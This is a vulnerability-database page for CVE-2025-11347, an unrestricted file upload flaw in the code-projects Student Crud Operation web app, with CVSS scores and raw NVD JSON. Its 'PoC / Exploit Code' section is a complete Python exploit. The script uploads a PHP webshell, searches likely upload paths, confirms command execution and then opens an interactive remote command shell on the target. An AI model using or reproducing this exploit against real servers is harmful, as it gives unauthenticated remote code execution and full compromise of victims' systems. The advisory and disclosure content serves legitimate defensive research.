Security Vulnerability Report
中文
CVE-2025-11347 CVSS 7.3 HIGH

CVE-2025-11347

Published: 2025-10-07 03:15:34
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in code-projects Student Crud Operation up to 3.3. This vulnerability affects the function move_uploaded_file of the file add.php of the component Add Student Page/Edit Student Page. Performing manipulation results in unrestricted upload. The attack can be initiated remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:crud_operation_system:*:*:*:*:*:*:*:* - VULNERABLE
code-projects Student Crud Operation <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11347 PoC - Student Crud Operation Unrestricted File Upload # Exploit for code-projects Student Crud Operation <= v3.3 import requests TARGET_URL = "http://target.com/add.php" # Replace with actual target SHELL_FILENAME = "shell.php" SHELL_CONTENT = "<?php system($_GET['cmd']); ?>" def exploit(target_url, filename, content): """ Exploit unrestricted file upload vulnerability in add.php Uploads a PHP webshell to achieve Remote Code Execution """ # Prepare the malicious PHP webshell file files = { 'file': (filename, content, 'application/x-php') } # Send the upload request to the vulnerable endpoint # The 'file' field name may vary depending on the actual form implementation response = requests.post(target_url, files=files) if response.status_code == 200: print(f"[+] File uploaded successfully!") # Common upload directory patterns upload_paths = [ f"/uploads/{filename}", f"/images/{filename}", f"/student_images/{filename}", f"/{filename}" ] for path in upload_paths: shell_url = target_url.rsplit('/', 1)[0] + path # Test if webshell is accessible test = requests.get(f"{shell_url}?cmd=id") if 'uid=' in test.text: print(f"[+] Webshell accessible at: {shell_url}") print(f"[+] Command execution confirmed: {test.text.strip()}") return shell_url print("[-] Exploit failed") return None if __name__ == "__main__": shell_url = exploit(TARGET_URL, SHELL_FILENAME, SHELL_CONTENT) if shell_url: # Interactive shell while True: cmd = input("shell> ") if cmd.lower() in ['exit', 'quit']: break result = requests.get(f"{shell_url}?cmd={cmd}") print(result.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11347", "sourceIdentifier": "[email protected]", "published": "2025-10-07T03:15:33.600", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in code-projects Student Crud Operation up to 3.3. This vulnerability affects the function move_uploaded_file of the file add.php of the component Add Student Page/Edit Student Page. Performing manipulation results in unrestricted upload. The attack can be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:crud_operation_system:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "673FBF47-A55C-4129-9A75-9BBFC1630665"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/romatdibrohiksnov/vulndb.com/tree/main/Student-Registration-Crud-Operation%20Unauthenticated%20Arbitrary%20File%20Upload%20leads%20to%20Remote%20Code%20Execution", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327232", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327232", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664897", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.